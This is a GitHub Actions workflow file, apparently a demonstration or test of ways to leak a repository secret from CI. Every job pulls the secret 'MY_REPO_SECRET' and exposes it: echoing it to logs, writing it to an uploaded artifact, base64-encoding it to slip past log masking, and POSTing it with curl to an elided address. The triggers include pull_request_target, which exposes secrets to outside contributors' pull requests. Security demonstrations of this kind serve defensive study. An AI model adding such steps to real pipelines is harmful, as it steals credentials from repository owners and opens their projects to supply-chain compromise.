name: CI

on:
  push:
    branches:
      - main
      - release/**
      - '*'
      - '!experimental'
  pull_request:
    branches:
      - main
      - '*'
  pull_request_target:
    types:
      - opened
    branches:
      - '*'
      - main

jobs:
  naive-secret-grab:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch_depth: 0
      - name: Echo Secrets
        env:
          SECRET: ${{ secrets.MY_REPO_SECRET }}
        run: |
          echo $SECRET
  secret-to-artifact:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch_depth: 0
      - name: Secret to file
        env:
          SECRET: ${{ secrets.MY_REPO_SECRET }}
        run: |
          touch secret.txt
          cat <<EOF > secret.txt
            $SECRET
          EOF
      - name: Artifact
        uses: actions/upload-artifact@v4
        with:
          name: secret
          path: secret.txt

  secret-to-base64:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch_depth: 0
      - name: Echo base64
        env:
          SECRET: ${{ secrets.MY_REPO_SECRET }}
        run: |
          echo $SECRET | base64

  secret-to-web:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch_depth: 0
      - name: Echo base64
        env:
          SECRET: ${{ secrets.MY_REPO_SECRET }}
        run: |
          curl -X POST ..... $SECRET


